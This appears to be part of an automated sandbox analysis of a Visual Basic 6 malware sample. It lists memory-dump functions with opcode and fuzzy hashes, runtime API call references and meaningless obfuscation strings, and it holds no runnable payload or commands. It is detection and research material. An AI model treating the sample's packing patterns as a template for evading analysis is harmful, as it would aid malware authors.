API String ID:
Opcode ID: 63c8537110cd6c2095ea977931cc43aeece4ed814f720e71146da2b78dc0a3da
Instruction ID: b5c45338a8a2ae75f134a59d408274c9811e256bc63f9ccabd10c1a7045768dc
Opcode Fuzzy Hash: 63c8537110cd6c2095ea977931cc43aeece4ed814f720e71146da2b78dc0a3da
Instruction Fuzzy Hash: 32510371A403589FCF358E288CA87DF7BAAAF89350F55422EEC4E9B241D3304A85DB51

Uniqueness

Uniqueness Score: -1.00%

Function 020B8ED0, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7c31c4aceb5736cafafd0895f062c7450348cb743a1be2b696ec7e6e079e3ff
Instruction ID: d29a09b8ebf2d6ad86325f3abbd4c2cdf9556966c3754f8dbe22ad9ca939a2c4
Opcode Fuzzy Hash: f7c31c4aceb5736cafafd0895f062c7450348cb743a1be2b696ec7e6e079e3ff
Instruction Fuzzy Hash: 0641F9619083868EDF738E388CC97D6BAD2AF53260F08C2AACD954E1DAD3758445DB17

Uniqueness

Uniqueness Score: -1.00%

Function 020B2C94, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d324df02511bde89fd87d9dd3a7930dbd499caad142034ed29d7400b3d5e36ca
Instruction ID: e9c30ef396030898f83f4472546f9d0fabd761a1295d350358c5c8f4dbdf8b9d
Opcode Fuzzy Hash: d324df02511bde89fd87d9dd3a7930dbd499caad142034ed29d7400b3d5e36ca
Instruction Fuzzy Hash: B341777020834A9FDF329E68C9847DA7BE2FF96394F84452DACCAD7141D3744A85DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B2CD9, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6636ca4cf65e0cfbfca4232bff1136283f1ec2d6859a91de978610333808e9c
Instruction ID: 940919a6a6c84bd6b34608adc44f9a9c2d0cb4a32c6d1cc0fbeaf1a7e22dca93
Opcode Fuzzy Hash: b6636ca4cf65e0cfbfca4232bff1136283f1ec2d6859a91de978610333808e9c
Instruction Fuzzy Hash: 994178342083468FDF329E68C9887DA7BE2FF56394F44452DACC6D7245D3708A85DB12

Uniqueness

Uniqueness Score: -1.00%

Function 020B3C0C, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2bdd11fde69c273aa7e6bc2039f6e8807ff0058aa852fe1b1fd6b741cfc0ab
Instruction ID: c5d8b8cf90ad3299bd703abd5f9d17ea59bb6a2a67aa2e24bfae816ed1dc0c16
Opcode Fuzzy Hash: 2a2bdd11fde69c273aa7e6bc2039f6e8807ff0058aa852fe1b1fd6b741cfc0ab
Instruction Fuzzy Hash: 5B41BD72608309CFDB766F7988557E9B7B2BF28300F56441ED9C98B121D3309981DB16

Uniqueness

Uniqueness Score: -1.00%

Function 020B2D30, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d4665e4c3a02b1aa910ef493138de8172032a90113bdfe57033cdc48119869d
Instruction ID: ec03da76265c7b9247912256561c83ae3d399b725eb5b098e48d02baecf8d116
Opcode Fuzzy Hash: 9d4665e4c3a02b1aa910ef493138de8172032a90113bdfe57033cdc48119869d
Instruction Fuzzy Hash: DB318D342083458FDF325E74D9483D97BD2BF423A4F49452DACC297182D3744A86DB02

Uniqueness

Uniqueness Score: -1.00%

Function 020B3C3F, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d110600cbd4c8b86381a2a89e45076d054d0e7ea0c8fd95d983ac6849b24ee4b
Instruction ID: 0967a6e8acb18a49075ce8bfb8397008d6b0b2e7a15fdfd02338af5d63f9251d
Opcode Fuzzy Hash: d110600cbd4c8b86381a2a89e45076d054d0e7ea0c8fd95d983ac6849b24ee4b
Instruction Fuzzy Hash: ED41AE72208309CFEB72AF798855BE9B7A2BF19340F56445AD9C98B121D33099C1DF16

Uniqueness

Uniqueness Score: -1.00%

Function 020B2D88, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b2c26940eeeb38f084f7c224cff72f215e6b9eb68aaa4e501f0cb4b1e356b4
Instruction ID: 988e1a8a4df3317d6586778c52439c4b08e80f9597c0c50393ff05b4e4431c69
Opcode Fuzzy Hash: e3b2c26940eeeb38f084f7c224cff72f215e6b9eb68aaa4e501f0cb4b1e356b4
Instruction Fuzzy Hash: 2631A93024E3828FDB225E7889893D9BFE2EF13298F09496D8CC297146D364458AD713

Uniqueness

Uniqueness Score: -1.00%

Function 020B813E, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c87460f19e2d894f534a6dc684eb7caae4e70baa8c316ecc0005456cab6ff8
Instruction ID: eb4d6cba5fb949b56a993de1977441a429e47f12fd2dd9ac3b9e17ba35756320
Opcode Fuzzy Hash: c8c87460f19e2d894f534a6dc684eb7caae4e70baa8c316ecc0005456cab6ff8
Instruction Fuzzy Hash: 8CF07F753022048FCB76DF18C994ADA73AAAF59A00F928965E945DB635D330ED80EB11

Uniqueness

Uniqueness Score: -1.00%

Function 020B5843, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe92cc366aade1435eba6acb9243068224026cda9da577f71b6529d0c33e0ef6
Instruction ID: ad847ea0ee5ccab6441137838f65a5b9348167bdaac49ae99368a751abc90859
Opcode Fuzzy Hash: fe92cc366aade1435eba6acb9243068224026cda9da577f71b6529d0c33e0ef6
Instruction Fuzzy Hash: 93C080B37004508FF751D759C54174077A2EF55644BC400E4E113DB745D264FD40C5D4

Uniqueness

Uniqueness Score: -1.00%

Function 020B9FF7, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa572106bb82a1e65cc3e8483165c8b4bbd33db51311f4fb564cd077f041c24
Instruction ID: 5948c5e0549f5a4aab0a5fc2b780dc4d7193a2a4b60b376d08c497daa2e5221e
Opcode Fuzzy Hash: 7fa572106bb82a1e65cc3e8483165c8b4bbd33db51311f4fb564cd077f041c24
Instruction Fuzzy Hash: 4CC09BC731A14203E3554E54E14D50B94D1172313DB3545B22145D5389F5D8D9081125

Uniqueness

Uniqueness Score: -1.00%

Function 020B7C70, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9545974ce58d9bb9547d08f59770bb2aa00a89ff6e66a3ecf5f20d60ad44aadf
Instruction ID: 0f636032ec728c38159ee01f4ef4ae66b0039e8079073afd21eaee44f96730a6
Opcode Fuzzy Hash: 9545974ce58d9bb9547d08f59770bb2aa00a89ff6e66a3ecf5f20d60ad44aadf
Instruction Fuzzy Hash: 1EC04C312117458FCA82DA48C254B9073A0EB05620FA104E0B05187713D259D9008601

Uniqueness

Uniqueness Score: -1.00%

Function 00411DE0, Relevance: 243.6, APIs: 77, Strings: 62, Instructions: 360COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00411E35
__vbaAryConstruct2.MSVBVM60(?,00403334,00000008), ref: 00411E42
__vbaStrCat.MSVBVM60(00402C94,00402C94), ref: 00411E52
#513.MSVBVM60(?,?,00000002), ref: 00411E6C
__vbaVarTstNe.MSVBVM60(?,?), ref: 00411E88
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 00411E9B
__vbaStrCopy.MSVBVM60 ref: 00411EB5
__vbaStrCopy.MSVBVM60 ref: 00411EC2
__vbaStrCopy.MSVBVM60 ref: 00411ECF
__vbaStrCopy.MSVBVM60 ref: 00411EDC
__vbaStrCopy.MSVBVM60 ref: 00411EE9
__vbaStrCopy.MSVBVM60 ref: 00411EF6
__vbaStrCopy.MSVBVM60 ref: 00411F03
__vbaStrCopy.MSVBVM60 ref: 00411F10
__vbaStrCopy.MSVBVM60 ref: 00411F1D
__vbaStrCopy.MSVBVM60 ref: 00411F2A
__vbaStrCopy.MSVBVM60 ref: 00411F37
__vbaStrCopy.MSVBVM60 ref: 00411F44
__vbaStrCopy.MSVBVM60 ref: 00411F51
__vbaStrCopy.MSVBVM60 ref: 00411F5E
__vbaStrCopy.MSVBVM60 ref: 00411F6B
__vbaStrCopy.MSVBVM60 ref: 00411F78
__vbaStrCopy.MSVBVM60 ref: 00411F85
__vbaStrCopy.MSVBVM60 ref: 00411F92
__vbaStrCopy.MSVBVM60 ref: 00411F9F
__vbaStrCopy.MSVBVM60 ref: 00411FAC
__vbaStrCopy.MSVBVM60 ref: 00411FB9
__vbaStrCopy.MSVBVM60 ref: 00411FC6
__vbaStrCopy.MSVBVM60 ref: 00411FD3
__vbaStrCopy.MSVBVM60 ref: 00411FE0
__vbaStrCopy.MSVBVM60 ref: 00411FED
__vbaStrCopy.MSVBVM60 ref: 00411FFA
__vbaStrCopy.MSVBVM60 ref: 00412007
__vbaStrCopy.MSVBVM60 ref: 00412014
__vbaStrCopy.MSVBVM60 ref: 00412021
__vbaStrCopy.MSVBVM60 ref: 0041202E
__vbaStrCopy.MSVBVM60 ref: 0041203B
__vbaStrCopy.MSVBVM60 ref: 00412048
__vbaStrCopy.MSVBVM60 ref: 00412058
__vbaStrCopy.MSVBVM60 ref: 00412068
__vbaStrCopy.MSVBVM60 ref: 00412078
__vbaStrCopy.MSVBVM60 ref: 00412088
__vbaStrCopy.MSVBVM60 ref: 00412098
__vbaStrCopy.MSVBVM60 ref: 004120A8
__vbaStrCopy.MSVBVM60 ref: 004120B8
__vbaStrCopy.MSVBVM60 ref: 004120C8
__vbaStrCopy.MSVBVM60 ref: 004120D8
__vbaStrCopy.MSVBVM60 ref: 004120E8
__vbaStrCopy.MSVBVM60 ref: 004120F8
__vbaStrCopy.MSVBVM60 ref: 00412108
__vbaStrCopy.MSVBVM60 ref: 00412118
__vbaStrCopy.MSVBVM60 ref: 00412128
__vbaStrCopy.MSVBVM60 ref: 00412138
__vbaStrCopy.MSVBVM60 ref: 00412148
__vbaStrCopy.MSVBVM60 ref: 00412158
__vbaStrCopy.MSVBVM60 ref: 00412168
__vbaStrCopy.MSVBVM60 ref: 00412178
__vbaStrCopy.MSVBVM60 ref: 00412188
__vbaStrCopy.MSVBVM60 ref: 00412198
__vbaStrCopy.MSVBVM60 ref: 004121A8
__vbaStrCopy.MSVBVM60 ref: 004121B8
__vbaStrCopy.MSVBVM60 ref: 004121C8
__vbaStrCopy.MSVBVM60 ref: 004121D8
__vbaStrCopy.MSVBVM60 ref: 004121E8
__vbaStrCopy.MSVBVM60 ref: 004121F8
__vbaStrCopy.MSVBVM60 ref: 00412208
__vbaStrCopy.MSVBVM60 ref: 00412218
__vbaStrCopy.MSVBVM60 ref: 00412228
#611.MSVBVM60 ref: 0041222A
__vbaStrMove.MSVBVM60 ref: 00412235
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041224D
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,0000001C), ref: 00412272
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403320,00000050), ref: 00412292
__vbaFreeObj.MSVBVM60 ref: 0041229B
__vbaFreeStr.MSVBVM60(00412300), ref: 004122E0
__vbaFreeStr.MSVBVM60 ref: 004122E5
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004122F9

Strings

NONSECRETIVELY, xrefs: 0041212D
MINDESMRKER, xrefs: 004120ED
Semiclassically7, xrefs: 0041207D
donatorerne, xrefs: 00411FD8
SAMMENSTDSPRVES, xrefs: 0041206D
VALFART, xrefs: 00411F2F
SOXHLET, xrefs: 004121DD
OUTPROMISE, xrefs: 0041200C
UNINDENTABLE, xrefs: 0041210D
Unaccredited, xrefs: 004120AD
KLOVNS, xrefs: 0041215D
Tutoyer, xrefs: 004121CD
TEDDYBEARFRAKKERNE, xrefs: 00411F08
spradebassers, xrefs: 004121FD
snrkler, xrefs: 00411FF2
cinema, xrefs: 004121ED
Bllehatten9, xrefs: 0041218D
Xanthochromia, xrefs: 00411FBE
TROKISKES, xrefs: 00411F22
sejlbrttets, xrefs: 00411F3C
Miskeep, xrefs: 00412019
landsttelsens, xrefs: 00411FFF
smaareparationer, xrefs: 004120FD
sissas, xrefs: 004121AD
GOOSELIVER, xrefs: 0041204D
Bangkoks, xrefs: 00411ED4
Berber, xrefs: 00411FCB
ernringstabellens, xrefs: 00411F49
Blacken4, xrefs: 00411F63
Inconformably, xrefs: 00411FA4
Bellyfuls3, xrefs: 00411EC7
Nonosmotically, xrefs: 00412033
REFERENCELISTE, xrefs: 0041216D
FORJOG, xrefs: 0041209D
skamskndet, xrefs: 00411F70
Satay, xrefs: 00411F97
Glorvrdigt, xrefs: 004120CD
proconsuls, xrefs: 004120DD
RECOVER, xrefs: 0041214D
byretsdommernes, xrefs: 00411FB1
gray, xrefs: 0041219D
CHAPTALISERINGERS, xrefs: 00411F15
Amyxorrhea, xrefs: 004121BD
Perfects, xrefs: 00412040
FRSTNINGEN, xrefs: 0041217D
Forthset, xrefs: 0041220D
PONDEROSITY, xrefs: 00411F7D
Dimmet, xrefs: 00411F8A
SYLFER, xrefs: 0041205D
Hofteskaal7, xrefs: 004120BD
HEMAPOPHYSIS, xrefs: 0041208D
methodistically, xrefs: 0041213D
Oplsningstegn7, xrefs: 00411EB0
Eftergrende2, xrefs: 00411EE1
PUBOISCHIAL, xrefs: 0041211D
Totalising, xrefs: 00411EEE
udlstes, xrefs: 00411EFB
Superlativs6, xrefs: 0041221D
SHPT, xrefs: 00411FE5
Forbrugsgodes8, xrefs: 00411EBA
biodynamiske, xrefs: 00411F56
Slagtekvgsmarked, xrefs: 00412026

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Copy$Free$CheckHresult$#513#611Construct2DestructListMoveNew2
String ID: Amyxorrhea$Bangkoks$Bellyfuls3$Berber$Blacken4$Bllehatten9$CHAPTALISERINGERS$Dimmet$Eftergrende2$FORJOG$FRSTNINGEN$Forbrugsgodes8$Forthset$GOOSELIVER$Glorvrdigt$HEMAPOPHYSIS$Hofteskaal7$Inconformably$KLOVNS$MINDESMRKER$Miskeep$NONSECRETIVELY$Nonosmotically$OUTPROMISE$Oplsningstegn7$PONDEROSITY$PUBOISCHIAL$Perfects$RECOVER$REFERENCELISTE$SAMMENSTDSPRVES$SHPT$SOXHLET$SYLFER$Satay$Semiclassically7$Slagtekvgsmarked$Superlativs6$TEDDYBEARFRAKKERNE$TROKISKES$Totalising$Tutoyer$UNINDENTABLE$Unaccredited$VALFART$Xanthochromia$biodynamiske$byretsdommernes$cinema$donatorerne$ernringstabellens$gray$landsttelsens$methodistically$proconsuls$sejlbrttets$sissas$skamskndet$smaareparationer$snrkler$spradebassers$udlstes
API String ID: 457099780-617233197
Opcode ID: cc72bfb61d1cc44b3800745dcf624b0a489beafae84f46bc30ab66ca11641690
Instruction ID: 21543b2dd0909ecf2c15098a99b0b2bc4a605ce204b50af73af4a8f0534ee9bd
Opcode Fuzzy Hash: cc72bfb61d1cc44b3800745dcf624b0a489beafae84f46bc30ab66ca11641690
Instruction Fuzzy Hash: 1BE1B674A101198BCB08DB94CA94AEDBBF9AF5C300F2480BBD502B7794DBB59E05CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00410040, Relevance: 131.7, APIs: 73, Strings: 2, Instructions: 408COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,00402BE0,00000011), ref: 004100BB
#556.MSVBVM60(?), ref: 004100DB
#536.MSVBVM60(?), ref: 004100FA
__vbaStrMove.MSVBVM60 ref: 0041010B
__vbaFreeVar.MSVBVM60 ref: 00410110
#613.MSVBVM60(?,?), ref: 00410124
__vbaStrVarMove.MSVBVM60(?), ref: 0041012E
__vbaStrMove.MSVBVM60 ref: 00410139
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00410144
__vbaVarDup.MSVBVM60 ref: 004101B0
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 004101DE
__vbaStrMove.MSVBVM60 ref: 004101E9
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 00410215
#594.MSVBVM60(?), ref: 0041023A
__vbaFreeVar.MSVBVM60 ref: 00410243
#675.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,00000000,3FF00000,?,?), ref: 00410279
__vbaFpR8.MSVBVM60 ref: 0041027F
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 004102AA
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 004102D6
__vbaStrMove.MSVBVM60 ref: 004102E1
__vbaFreeVar.MSVBVM60 ref: 004102E6
__vbaUI1I2.MSVBVM60 ref: 004102F7
__vbaUI1I2.MSVBVM60 ref: 00410303
__vbaUI1I2.MSVBVM60 ref: 00410310
__vbaUI1I2.MSVBVM60 ref: 0041031D
__vbaUI1I2.MSVBVM60 ref: 0041032A
__vbaUI1I2.MSVBVM60 ref: 00410337
__vbaUI1I2.MSVBVM60 ref: 00410344
__vbaUI1I2.MSVBVM60 ref: 00410351
__vbaUI1I2.MSVBVM60 ref: 0041035E
__vbaUI1I2.MSVBVM60 ref: 0041036B
__vbaUI1I2.MSVBVM60 ref: 00410378
__vbaUI1I2.MSVBVM60 ref: 00410385
__vbaUI1I2.MSVBVM60 ref: 00410392
__vbaUI1I2.MSVBVM60 ref: 0041039F
__vbaUI1I2.MSVBVM60 ref: 004103AC
__vbaUI1I2.MSVBVM60 ref: 004103B9
__vbaUI1I2.MSVBVM60 ref: 004103C6
__vbaUI1I2.MSVBVM60 ref: 004103D3
__vbaUI1I2.MSVBVM60 ref: 004103E0
__vbaUI1I2.MSVBVM60 ref: 004103ED
__vbaUI1I2.MSVBVM60 ref: 004103FA
__vbaUI1I2.MSVBVM60 ref: 00410407
__vbaUI1I2.MSVBVM60 ref: 00410414
__vbaUI1I2.MSVBVM60 ref: 00410421
__vbaUI1I2.MSVBVM60 ref: 0041042E
__vbaUI1I2.MSVBVM60 ref: 0041043B
__vbaUI1I2.MSVBVM60 ref: 00410448
__vbaUI1I2.MSVBVM60 ref: 00410455
__vbaUI1I2.MSVBVM60 ref: 00410462
__vbaUI1I2.MSVBVM60 ref: 0041046F
__vbaUI1I2.MSVBVM60 ref: 0041047C
__vbaUI1I2.MSVBVM60 ref: 00410489
__vbaUI1I2.MSVBVM60 ref: 00410496
__vbaUI1I2.MSVBVM60 ref: 004104A3
__vbaUI1I2.MSVBVM60 ref: 004104B0
__vbaUI1I2.MSVBVM60 ref: 004104BD
__vbaUI1I2.MSVBVM60 ref: 004104CA
__vbaUI1I2.MSVBVM60 ref: 004104D7
__vbaUI1I2.MSVBVM60 ref: 004104E4
__vbaUI1I2.MSVBVM60 ref: 004104F1
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041050C
__vbaCastObj.MSVBVM60(?,00402B9C,Scance), ref: 00410528
__vbaObjSet.MSVBVM60(?,00000000), ref: 00410533
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000040), ref: 0041054D
__vbaFreeObj.MSVBVM60 ref: 00410556
__vbaFreeStr.MSVBVM60(004105EE), ref: 004105B1
__vbaFreeObj.MSVBVM60 ref: 004105B6
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004105D4
__vbaFreeStr.MSVBVM60 ref: 004105D9
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004105E1
__vbaFreeStr.MSVBVM60 ref: 004105E6
__vbaFreeStr.MSVBVM60 ref: 004105EB

Strings

Slovenlike8, xrefs: 0041019C
Scance, xrefs: 0041051D

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$Destruct$#536#556#594#596#613#675#704CastCheckConstruct2HresultNew2
String ID: Scance$Slovenlike8
API String ID: 3329537368-3205232076
Opcode ID: f7203f652448cc3a9f077555155d4129e5e8dad0fd7520a3093d64fa1320640f
Instruction ID: a5e638906f7cf2d5222f69620d5792a37cc04a9d675b09c95cfe94f22794de18
Opcode Fuzzy Hash: f7203f652448cc3a9f077555155d4129e5e8dad0fd7520a3093d64fa1320640f
Instruction Fuzzy Hash: 10027970D00258DFDB04DFA8C850BDDBFB9AF48310F1481ABD546A7392CA745A8ACFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00415070, Relevance: 66.7, APIs: 35, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 004150BF
#696.MSVBVM60(00403588), ref: 004150CA
#704.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 004150F1
__vbaStrMove.MSVBVM60 ref: 00415102
__vbaFreeVar.MSVBVM60 ref: 0041510D
#702.MSVBVM60(?,000000FF,000000FE,000000FE,000000FE), ref: 00415125
__vbaStrMove.MSVBVM60 ref: 00415130
__vbaFreeVar.MSVBVM60 ref: 00415135
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041514A
__vbaCastObj.MSVBVM60(?,00402B9C,Benhaarde), ref: 00415166
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415171
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000040), ref: 00415191
__vbaFreeObj.MSVBVM60 ref: 00415196
__vbaFreeObj.MSVBVM60 ref: 004151A7
#670.MSVBVM60(?), ref: 004151BF
__vbaVarTstEq.MSVBVM60(?,?), ref: 004151DB
__vbaFreeVar.MSVBVM60 ref: 004151E7
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00415205
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 0041522A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000058), ref: 0041524A
__vbaStrMove.MSVBVM60 ref: 00415259
__vbaFreeObj.MSVBVM60 ref: 00415268
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041527D
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 004152A2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000138), ref: 004152CB
__vbaFreeObj.MSVBVM60 ref: 004152D0
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 004152E5
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004152FB
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000010), ref: 00415315
__vbaFreeObj.MSVBVM60 ref: 0041531A
__vbaFreeStr.MSVBVM60(00415371), ref: 00415356
__vbaFreeStr.MSVBVM60 ref: 0041535B
__vbaFreeObj.MSVBVM60 ref: 00415360
__vbaFreeStr.MSVBVM60 ref: 00415369
__vbaFreeStr.MSVBVM60 ref: 0041536E

Strings

Benhaarde, xrefs: 0041515B
Venus, xrefs: 004152AB
Plagiaries, xrefs: 004151CD

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$#670#696#702#704AddrefCastCopy
String ID: Benhaarde$Plagiaries$Venus
API String ID: 1170278566-3599771543
Opcode ID: 946bca1c0af24f8bebdfbaf5d935adf5e83a84faa24c3de442fd1099571333d4
Instruction ID: 264c8b2a3659b730031e9962525b5dcccc50e4bcfe7d84867258fc1165aeb928
Opcode Fuzzy Hash: 946bca1c0af24f8bebdfbaf5d935adf5e83a84faa24c3de442fd1099571333d4
Instruction Fuzzy Hash: 7C915271D00619ABDB04DFA4DD48EDE7BB8EF48710B208526F951B32E0DB745945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004156A0, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

#610.MSVBVM60(?), ref: 0041570E
#661.MSVBVM60(?,004036D4,00000000,3FF00000,?), ref: 00415723
#610.MSVBVM60(?), ref: 0041572D
__vbaVarAdd.MSVBVM60(?,?,?,?), ref: 00415756
__vbaVarTstNe.MSVBVM60(00000000), ref: 0041575D
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00415778
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041579C
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 004157C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000078), ref: 004157F2
__vbaFreeObj.MSVBVM60 ref: 004157F7
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041580F
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00415834
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000108), ref: 0041585D
__vbaFreeObj.MSVBVM60 ref: 00415862
__vbaVarDup.MSVBVM60 ref: 00415885
#600.MSVBVM60(?,00000002), ref: 00415891
__vbaFreeVar.MSVBVM60 ref: 0041589C
#671.MSVBVM60(00000000,00000000,00000000,40000000,00000000,40000000), ref: 004158B8
__vbaFpR8.MSVBVM60 ref: 004158BE
#706.MSVBVM60(00000001,00000000,00000000), ref: 004158D9
__vbaStrMove.MSVBVM60 ref: 004158E4
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 004158FC
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00415921
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,000000D8), ref: 00415947
__vbaStrMove.MSVBVM60 ref: 00415952
__vbaFreeObj.MSVBVM60 ref: 0041595B
__vbaInStr.MSVBVM60(00000000,Ahmeds,Miscookery,FF9B19EF), ref: 00415971
__vbaFreeStr.MSVBVM60(004159C5), ref: 004159BD
__vbaFreeStr.MSVBVM60 ref: 004159C2

Strings

Ahmeds, xrefs: 0041596B
UNINNOCUOUSNESS, xrefs: 00415871
Miscookery, xrefs: 00415966

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$#610Move$#600#661#671#706List
String ID: Ahmeds$Miscookery$UNINNOCUOUSNESS
API String ID: 3095452629-3195696048
Opcode ID: f8fd8ae14cf9680d404d6b874b38d7acf0a207de4ceecd46b11984bc9e9f99f2
Instruction ID: a2940ce3e2a502893dcd07b5433585404a0546a3714ab7f27c6c05bce44a2662
Opcode Fuzzy Hash: f8fd8ae14cf9680d404d6b874b38d7acf0a207de4ceecd46b11984bc9e9f99f2
Instruction Fuzzy Hash: 1D915C71900608EBCB14DFA1DD89EDEBBB8EF98700F20446AF505B72A0D7746985CF68

Uniqueness

Uniqueness Score: -1.00%

